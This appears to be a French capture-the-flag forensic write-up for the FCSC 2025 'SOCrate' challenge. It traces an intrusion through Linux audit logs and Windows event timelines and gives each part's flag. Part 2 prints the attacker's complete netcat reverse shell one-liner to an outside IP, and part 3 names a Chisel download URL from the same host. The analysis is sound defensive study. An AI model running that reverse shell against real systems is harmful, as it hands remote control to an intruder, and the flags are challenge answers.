Challenge forensic FCSC 2025 en 6 parties — analyse d’un incident de sécurité sur infrastructure hybride Linux/Windows.

SOCrate 1/6 — Technologie

Question : Identifier le chemin de l’application web sur le serveur.

Grep sur les logs d’audit Linux à la recherche de chemins /var/www :

grep -r "/var/www" /var/log/audit/

Flag : FCSC{/var/www/app/banque_paouf/}

SOCrate 2/6 — Reverse Shell

Question : Retrouver la commande du reverse shell exécuté par l’attaquant.

Analyse des logs d’audit Linux avec ausearch filtré sur le processus bash. Les enregistrements PROCTITLE contiennent les lignes de commande encodées en hexadécimal :

ausearch -c bash | grep PROCTITLE | xxd -r -p

Reverse shell identifié

Flag : FCSC{/bin/bash -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50012 >/tmp/f}

SOCrate 3/6 — Outil Téléchargé

Question : URL de téléchargement et nom original du binaire.

Filtrage des logs d’audit pour les commandes wget postérieures au timestamp du reverse shell. Le binaire text a été téléchargé depuis http://80.125.9.58:80/text. Une analyse des patterns comportementaux — syntaxe client, mode tunneling TCP — a permis d’identifier l’outil comme Chisel.

Analyse ChatGPT du binaire

Flag : FCSC{http://80.125.9.58:80/text|chisel}

SOCrate 4/6 — Latéralisation

Question : IP et FQDN ciblés par les requêtes LDAP de l’outil.

Recherche dans les logs d’audit sur le port 389 (LDAP), découverte de 172.16.42.10. Les logs Windows via Timeline Explorer ont fourni le FQDN associé.

Adresses IP identifiées

Flag : FCSC{172.16.42.10|DC01-SRV.cipherpol.gouv}

SOCrate 5/6 — Vol de Clés

Question : FQDN de la machine cible, chemin du fichier sensible, IP source de l’attaquant.

Timeline Explorer a révélé des commandes icacls modifiant les permissions sur C:\Users\jeanne.dias\.ssh\vm1.pem sur WORKSTATION2. La corrélation des Logon ID via ripgrep et strings a permis d’identifier l’IP source.

Flag : FCSC{WORKSTATION2.cipherpol.gouv|C:\Users\jeanne.dias\.ssh\vm1.pem|172.16.45.110}

SOCrate 6/6 — Outil Utilisé

Question : Outil offensif utilisé pour l’élévation de privilèges.

Les alertes Hayabusa et la documentation CrowdStrike sur les méthodes de détection ont fait correspondre les patterns d’activité à wmiexec, composant du framework Impacket.

Rapport Hayabusa

Flag : FCSC{wmiexec}

WindowsLinuxLogsFCSC 2025
← retour aux articles